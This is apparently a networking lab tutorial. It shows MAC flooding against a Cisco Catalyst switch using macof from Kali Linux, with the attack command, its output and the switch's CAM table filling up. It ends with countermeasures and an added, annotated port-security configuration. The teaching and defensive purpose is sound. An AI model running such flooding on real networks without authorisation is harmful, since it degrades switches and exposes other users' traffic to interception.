At this point I like to show my networking students a practical tool that floods the CAM table of a Cisco Catalyst switch. This post is unrelated to the previous and next ones.
macof
The command macof (shipped in the dsniff package) is the tool we will use to flood a LAN switch, in our example a Cisco Catalyst, with frames carrying random source MAC addresses. Here is our topology:
Why is this important?
Switches have limited resources, and on Cisco Catalyst switches we can check how many of those resources are available to us. For example, this Catalyst switch can hold up to 8K unicast MAC addresses in its MAC address table:
Switch#show sdm prefer
The current template is "default" template.
The selected template optimizes the resources in
the switch to support this level of features for
0 routed interfaces and 255 VLANs.
number of unicast mac addresses: 8K
number of IPv4 IGMP groups + multicast routes: 0.25K
number of IPv4 unicast routes: 0.375k
number of directly-connected IPv4 hosts: 0.375k
number of indirect IPv4 routes: 0
number of IPv6 multicast groups: 0.25K
number of IPv6 unicast routes: 0.25K
number of directly-connected IPv6 addresses: 0.25K
number of indirect IPv6 unicast routes: 0
number of IPv4 policy based routing aces: 0
number of IPv4/MAC qos aces: 0.375k
number of IPv4/MAC security aces: 0.375k
number of IPv6 policy based routing aces: 0
number of IPv6 qos aces: 60
number of IPv6 security aces: 0.125k
Because the MAC address table is finite, if a threat actor injects more source MAC addresses than the switch can hold, the switch can no longer learn new addresses. Frames destined to any address it has not learned are then flooded out of every port in the VLAN, so the switch effectively behaves like a hub and the attacker's host receives traffic meant for other stations.
Let's see how many dynamic MAC addresses the switch has learnt so far:
Switch#show mac address-table dynamic
Mac Address Table
-------------------------------------------
Vlan Mac Address Type Ports
---- ----------- -------- -----
1 0050.56a5.8f1e DYNAMIC Gi2/0/1
Total Mac Addresses for this criterion: 1
Now let's generate 500 frames with macof, each carrying a new random source MAC address, then check the switch's CAM table. We expect the dynamic address count to grow by 500 on top of the one entry already learnt.
If macof is not installed on your Kali Linux, install the dsniff package with sudo apt install dsniff. (You can refer to the post here for more information about Debian package management.)
┌──(kali㉿kali-1)-[~]
└─$ sudo macof -i eth1 -n 500
c2:45:4b:15:25:65 81:30:a5:c:f4:79 0.0.0.0.28326 > 0.0.0.0.38890: S 367494066:367494066(0) win 512
9:68:aa:5:1e:98 b3:91:7d:62:82:42 0.0.0.0.18617 > 0.0.0.0.27713: S 1000482956:1000482956(0) win 512
b1:cd:ba:5e:b6:3d df:4f:0:22:f5:f1 0.0.0.0.25409 > 0.0.0.0.10998: S 2097405006:2097405006(0) win 512
ec:2b:3:49:5f:34 9a:df:e8:f:16:b2 0.0.0.0.3015 > 0.0.0.0.40185: S 1446148009:1446148009(0) win 512
Switch#show mac address-table count
Mac Entries for Vlan 1:
---------------------------
Dynamic Address Count : 501
Static Address Count : 0
Total Mac Addresses : 501
Total Mac Address Space Available: 7670
How to counter MAC flooding
There are three ways to counter a MAC flood:
- Port security: Please refer to here for more information
- 802.1X (a.k.a. dot1x): Please refer to here for more information
- MAC address filtering: Please refer to here for more information
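Port security is the countermeasure that most directly stops the flood shown above, so here is an added example of how it would be configured on the Catalyst in this lab. It is not from the original post. It assumes the Kali host is attached to GigabitEthernet2/0/1, the port seen in the show mac address-table output, and that at most two legitimate MAC addresses (for example an IP phone and a PC) are expected on that port; both are assumptions for illustration.

```cisco
! Added example, not from the original post. Assumed: the Kali host
! sits on Gi2/0/1 and at most 2 legitimate MACs are expected on it.
Switch# configure terminal
! Port security is only accepted on static access (or trunk) ports,
! not on ports left in dynamic (DTP) mode.
Switch(config)# interface GigabitEthernet2/0/1
Switch(config-if)# switchport mode access
Switch(config-if)# switchport port-security
! Cap the number of MACs this port may learn. With this in place,
! macof's third random address already triggers a violation
! instead of 500 new entries landing in the CAM table.
Switch(config-if)# switchport port-security maximum 2
! restrict: drop offending frames, log a violation and count it,
! but keep the port up (shutdown would err-disable the port;
! protect drops silently with no log or counter).
Switch(config-if)# switchport port-security violation restrict
! Age out dynamic secure entries idle for 5 minutes so a replaced
! host does not stay locked out behind a stale address.
Switch(config-if)# switchport port-security aging time 5
Switch(config-if)# switchport port-security aging type inactivity
Switch(config-if)# exit
! If violation shutdown is chosen instead, let err-disabled ports
! recover on their own after 300 seconds.
Switch(config)# errdisable recovery cause psecure-violation
Switch(config)# errdisable recovery interval 300
Switch(config)# end
! Verify, then re-run macof: the violation counter climbs while
! "show mac address-table count" stays flat.
Switch# show port-security interface GigabitEthernet2/0/1
Switch# show port-security address
```

The maximum value should match the number of devices actually expected behind the port; setting it too low on a port that carries a phone and a PC produces false violations, while leaving it at the default of 1 is appropriate for a plain single-host access port.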